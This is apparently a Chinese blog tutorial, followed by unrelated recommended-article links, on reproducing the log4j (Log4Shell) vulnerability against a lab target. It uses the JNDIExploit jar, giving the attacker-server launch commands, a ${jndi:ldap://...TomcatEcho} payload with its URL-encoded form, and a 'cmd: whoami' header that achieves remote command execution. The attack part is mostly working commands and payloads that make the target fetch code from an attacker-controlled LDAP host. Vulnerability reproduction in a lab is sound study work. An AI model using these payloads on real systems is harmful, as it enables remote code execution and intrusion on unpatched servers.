JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

1.首先搭建log4j靶场

2.开启服务

Windows攻击端执行以下命令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1

再开一个cmd可以看下能用什么payload

java -jar JNDIExploit-1.2-SNAPSHOT.jar -u

以上payload都可以尝试,我们使用

ldap://null:1389/TomcatBypass/TomcatEcho

3.构造请求

${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}

转成URL

%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D

4.开启bp

请求包中增加cmd:whoami

执行后发现命令可以执行

相关推荐
智码看视界6 分钟前
老梁聊全栈系列:(阶段一)从单体到云原生的演进脉络
java·云原生·c5全栈
望获linux25 分钟前
【实时Linux实战系列】规避缺页中断:mlock/hugetlb 与页面预热
java·linux·服务器·数据库·chrome·算法
失散131 小时前
分布式专题——9 Redis7底层数据结构解析
java·数据结构·redis·分布式·缓存·架构
馨谙1 小时前
设计模式之单例模式大全---java实现
java·单例模式·设计模式
程序员TNT1 小时前
Shoptnt 安全架构揭秘:JWT 认证与分布式实时踢人方案
java·redis·分布式·架构
水无痕simon1 小时前
3 水平分表
java·数据库
野生程序员y1 小时前
深入解析Spring AOP核心原理
java·后端·spring
阿萨德528号1 小时前
ZooKeeper Java客户端与分布式应用实战
java·zookeeper·java-zookeeper
死也不注释1 小时前
【Unity UGUI 交互组件——Dropdown(TMP版本)(10)】
java·unity·交互
狼爷1 小时前
凌晨 4 点的线上 CPU 告警:一场历时 4 小时的故障排查与架构优化全记录
java